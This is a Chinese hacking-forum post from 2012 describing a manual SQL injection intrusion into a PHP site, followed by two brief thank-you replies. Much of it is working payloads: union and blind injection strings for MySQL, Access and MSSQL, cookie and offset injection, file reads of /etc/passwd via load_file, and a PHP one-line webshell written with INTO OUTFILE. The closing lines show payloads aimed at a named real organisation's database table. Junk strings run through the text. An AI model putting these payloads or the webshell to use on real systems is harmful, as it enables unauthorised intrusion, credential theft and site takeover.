找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2889|回复: 2
打印 上一主题 下一主题

手工注入拿下一站

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-23 14:47:22 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
我一个朋友维护一个站点,他对安全不是很懂,就像我一样,呵呵 !O(∩_∩)O~
$ c6 i  o( b7 a. z% S让我看看,既然人家开口了,我也不好拒绝,那就看看吧?
2 e/ E; E! p% D* r0 k9 N: W我个人喜欢先看有没有上传的地方(上传可是好东西,可以直接拿shell'),其次就是看看什么程序,有没有通杀,然后就是后台,最后看看注入。。。。
4 ?8 R; q9 O+ T/ d# f如果是php程序我会先找注入,呵呵!(这个不用我说你们也知道是什么原因咯,废话了,主题开始。。。)# h2 B7 Q; \- Q  R- p# D7 _
1.打开地址,发现是php程序,呵呵.既然是php程序,先找找注入吧?看看有没有交互的地方,(所谓交互就是像news.php?id=1,news.asp?id=1这样的,)( k9 a& z# R- G
这个站很悲剧,随便点开一个链接加一个 ’ 结果悲剧了,爆出:
* X8 {% O$ W- bWarning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
7 K. [  q7 \1 M3 _. A8 H/data/home/nus42j1/htdocs/news.php on line 59 ,物理路径出来了,到这一步啊,已经可以证实存在注入# B* D# l9 H) n
                         : e3 ?% p0 I) ~, P+ O
2.不过既然是学习,我们就要一步一步的来,还是老规矩 and 1=1 ,and 1=2 ,返回结果不一样,证明存在注入,
# x( f& Y! A; `3 y3.下一步很自然的查询字段数:用order by+二分法,加上order by 8 返回正常,order by 9 不正常。说明字段数为8 ,继续提交 and 1=2 union select 1,2,3,4,5,6,7,8 - -返回一个3   ,一个5 ,说明可以利用字段数才两个,有时候会有很多个哦,要注意5 k: Z. ]5 n# ]
4.继续提交and 1=2 union select 1,2,user(),4,version(),6,7,8-- ,当然还有database(),等等.......返回版本,用户等等系列信息
! I3 h! m0 e9 _5.rp差了一点,不是root权限,不过版本大于5.0,支持虚拟库information_schema。
2 d$ `4 \4 C5 U5 h8 c2 X& `: Q. V有两种思路:1.使用Load_file函数获取数据库账号密码,通过操作数据库获取webshell,
3 R. V" q  |& s" b+ P* p0 [2.继续爆出数据库里的表名和列名,登陆后台想办法上传获取webshell。
7 [' }9 k" v& m" m2 N3 e: n我就用的是第二个思路,/ `" H, y% R0 x! {" b6 {
提交and 1=2 union select 1,2,3,4,table_name,6,7,8  from information_schema.tables where table_schema=database() limit 0,1--  8 c7 S/ S5 D) e7 X- \
6.由于数据库表比较多,这里有48个表,我只是做检测,原理是这样,剩下的只要把 limit 0,1 中的0一次往上加可以爆出所有表名,然后是获取表里的字段,
' F" d* i; L- N7 n提交:and 1=2 union select 1,2,3,4, COLUMN_NAME,6,7,8 from information_schema.columns where table_name=0x635F61646D696E5F616373696F6E limit 0,1--
, E  v4 N3 R: J, H) V注意:这里的0x635F61646D696E5F616373696F6E是kc_admin_action 表的十六进制表示,得到密码账号后就到md5破解网站进行破解。. v  H* U+ e+ A  e7 Q& i
7.到这里呢我该结束了,还要提供给我朋友修补的意见,不过写了这么多了,也不怕在写一点,延伸思路,如果你的密文md5破不出来呢????怎么办????
4 S. V' K3 n  n; |% [0 s9 |是不是放弃了,当然不是,看看开了什么端口,如果是centos,lamp环境。我们自然是用load_file了,先验证有读的权限, /etc/passwd....., C: l- G; q" l; j5 J
提交:and 1=2 union select 1,2,3,4,load_file(你要找的东东),6,7,8 --. c. t, O( a: a, s. X" U, W
然后你就找你要的信息,主要是一些敏感文件,还有就是有没有前辈留下的东西,比如某些记录口令保存在本地的东东,我们还可以通过操作数据库备份出来一个shell,4 N$ L" v3 _$ v5 x8 l% p- M- m+ P% D
调出mysql命令,执行:Select '<?php eval($_POST[cmd]);?>' into outfile '/xxx/xxx/1.php ,也可以分步执行建立一个临时表插入一句话,然后备份,前者比较简单并且不容易误删什么东西。前提是我们要有写入权限......
/ T: ^7 h6 J. c3 h+ @9 Q" G  x1 t% e下面是一些很普遍注入方式资料:, t: ~$ }$ `8 O, ?1 z  w! N
注意:对于普通的get注入,如果是字符型,前加' 后加 and ''='
* ]% L( m) `# y7 ?: Z. ^( S1 w7 m# x拆半法( t5 _: _. m$ t1 F7 |4 b4 c2 J
######################################
, u* ^& Q' j1 s/ k$ P3 p, Oand exists (select * from MSysAccessObjects) 这个是判断是不是ACC数据库,MSysAccessObjects是ACCESS的默认表。
8 r" B- L2 t: s9 H: \- ~2 oand exists (select * from admin), {0 ^0 A1 ?& w6 ]+ @
and exists(select id from admin)
! t/ M; j6 B2 p" H3 ]' U5 dand exists(select id from admin where id=1)
& }! ?0 |6 v0 f6 V. p; @and exists(select id from admin where id>1) ! K# \3 S" |; z1 r2 K8 {( G
然后再测试下id>1 正常则说明不止一个ID 然后再id<50 确定范围
8 _4 X% H5 w2 T7 e3 k2 N2 J3 h$ Yand exists (select username from admin)% G2 [) \* v' v4 g) A8 \
and exists (select password from admin)6 B4 N* ?' D6 {- x: F6 n& k/ j
and exists (select id from admin where len(username)<10 and id=1)4 g6 n) k, U0 K: K7 R1 Y# S
and exists (select id from admin where len(username)>5 and id=1)
& ]* m& w% L$ A8 a) Rand exists (select id from admin where len(username)=6 and id=1)
$ s  q7 C& s  v8 }9 Y4 _0 Pand exists (select id from admin where len(password)<10 and id=1)% V0 {: t- X' ?8 b# G4 }. J
and exists (select id from admin where len(password)>5 and id=1)
' l8 j0 }+ e5 t$ v6 F2 o( jand exists (select id from admin where len(password)=7 and id=1)
2 i; u$ }: D. _0 |" A3 h6 E+ c& [  Yand (select top 1 asc(mid(username,1,1)) from admin)=97$ B9 @) P) w5 k* D/ _6 z7 i
返回了正常,说明第一username里的第一位内容是ASC码的97,也就是a。- k" T/ D' P( Z
猜第二位把username,1,1改成username,2,1就可以了。
; w* C, ?% ]: p* }猜密码把username改成password就OK了
0 [% e  k1 ?& C##################################################0 w, e5 A" O3 g1 p. `& g
搜索型注入
) X2 Q. |3 W4 U##################################8 T0 ^/ A9 l- N) \2 Y! Z, C
%' and 1=1 and '%'='
4 l4 r+ ~2 ~8 @%' and exists (select * from admin) and '%'='1 S0 r" e6 e. I* X6 Y
%' and exists(select id from admin where id=1) and '%'='& x" t! U) c6 a
%' and exists (select id from admin where len(username)<10 and id=1) and '%'='% Z2 j7 I. L+ |& Q' O2 l
%' and exists (select id from admin where len(password)=7 and id=1) and '%'='9 U7 \5 m& \- P* M
%' and (select top 1 asc(mid(username,1,1)) from admin)=97 and '%'='
* U9 c5 R, |" @; h4 Z* B这里也说明一下,搜索型注入也无他,前加%' 后加 and '%'='; X8 l$ B" l* A3 z0 o  p
对于MSSQL数据库,后面可以吧 and '%'='换成--
7 [% o& h- v( q* {; z; A还有一点搜索型注入也可以使用union语句。- o7 W8 F" `8 B$ D& z' {& p1 K
########################################################) l. `5 T4 Y8 F! o7 }# _  N
联合查询。$ I( v% }* \) _
#####################################
9 y2 l9 |4 ?  I7 vorder by 10
- l* e' H; e1 g1 A3 v" a5 C* _" Z6 fand 1=2 union select 1,2,3,4,5,6,7,8,9,10
* e9 N9 v& J  I" x$ Jand 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin
1 J! X% j+ D) l& m' _) ~and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin where id=1
2 p- `$ q# `8 c8 b% a8 W! Z很简单。有一点要说明一下,where id=1 这个是爆ID=1的管理员的时候,where id=1就是爆ID=2的管理用的,一般不加where id=1这个限制语句,应该是爆的最前面的管理员吧!(注意,管理的id是多少可不一定哈,说不定是100呢!)
6 m5 w1 W  M/ f# g+ a. A3 k###################################
& e$ `2 u) Q9 ?: Fcookie注入
6 u& @/ w6 p4 b2 ^; ^: p###############################; Q+ [5 }5 [( r
http://www.******.com/shownews.asp?id=127, o* n+ R" f3 [! ]6 w
http://www.******.com/shownews.asp2 H' E8 Z" ]9 N1 C+ B' L6 U
alert(="id="+escape("127"));" q7 H3 {# x% `# r( Y5 E
alert(="id="+escape("127 and 1=1"));$ z$ \5 G9 N1 A3 |  y0 j
alert(="id="+escape("127 order by 10"));$ n! _7 O  h# M. |
alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));" S' ^( V+ v# a: b
alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin where id=1"));
9 [" z+ M8 f" E# b这些东西应该都不用解释了吧,给出语句就行了吧。这里还是用个联合查询,你把它换成拆半也一样,不过不太适合正常人使用,因为曾经有人这样累死过。
5 i; H7 R# U" X; h$ W* S* n' Y7 h###################################' m, T6 Y! t! q, y9 i' g! B
偏移注入6 l$ y+ W: r5 a6 j" }1 [
###########################################################
- C2 R2 {1 S* L1 M  x0 funion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
/ g" V/ k! y* l; j/ h! _  iunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,* from admin
* y3 h0 Y/ U, s8 f0 u; a2 runion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from (admin as a inner join admin as b on a.id=b.id)
7 H2 a# s5 x2 ]  M6 F9 gunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,* from (admin as a inner join admin as b on a.id=b.id), b7 K& X. K$ ~% O& s( l' A/ [+ g6 R
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
  \3 v  y. ^- k) v4 K! aunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)
) D. m+ \' _$ F6 B$ R( ~/ h4 eunion select 1,2,3,4,5,6,7,8,a.id,b.id,c.id,d.id,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d on- i( \9 G4 ?) Z" m$ m1 J
a.id=d.id)
: b2 E4 W0 P3 m8 u. {7 nand 1=2 union select 1,* from (admin as a inner join admin as b on a.id=b.id)0 ]4 J* \& B9 Y8 o& L
and 1=2 union select 1,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
7 }& E" J2 f4 o, @% i( F4 B$ h  
: @- m6 @( [; u# i, n* J- L============================================================================================================
3 r# d; y7 a: Y7 c; M0 {. K1.判断版本% P7 d& x& ~7 T* m% a6 ^
and ord(mid(version(),1,1))>514 l' z* r* c' x; x- Y
返回正常,说明大于4.0版本,支持ounion查询
" H' @/ {* Z# h$ ^7 E2 x3 ^( s' D2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解
# e0 Q% p6 ]/ ]( J/ Pand 2=4 union select 1,2,3,4,5,6,7,8,9--
) L5 p" d' p2 t0 X3.查看数据库版本及当前用户,3 B& m1 v- E4 U0 H1 h# j, |7 ~! d
and 2=4 union select 1,user(),version(),4,5,6,7,8,9--
% G: i+ H/ `9 b! }数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,
: d0 _0 V. W& d% n- v" U1 g  ?4.判断有没有写权限( k) r1 i* \" }7 f) n7 |" \$ M
and (select count(*) from MySQL.user)>0--
% ^5 o) F. V7 D0 y5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1& j% L* O% z0 C# C4 |, d
用不了这个命令,就学习土耳其黑客手法,如下
4 I: u. H$ ^, Z  f" J+ D% I7 i7 Cand+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
# F5 {5 }; z- x% O3 D4 Z6.爆表,爆库
( ~& E3 O" o9 c4 m- Nand+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
% e2 V5 v  v4 w3 i& I. q7.爆列名,爆表3 r% _* {( z6 }: T* d
and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
; q2 @3 q; M6 P; {2 z. k8.查询字段数,直接用limit N,1去查询,直接N到报错为止。/ W: |0 h% Q3 R" A3 t* l! n" {0 G
and+1=0+union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
2 H! J: V; N* M/ J, c9.爆字段内容
' X9 T4 d. Q" @, U8 Yand+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--' V' |: ]( d/ r) }
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
回复

使用道具 举报

沙发
发表于 2012-9-24 21:40:46 | 只看该作者
非常好的归纳。坐下慢慢看~
回复 支持 反对

使用道具 举报

板凳
发表于 2012-9-25 18:53:39 | 只看该作者
谢谢分享,学习思路啊
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表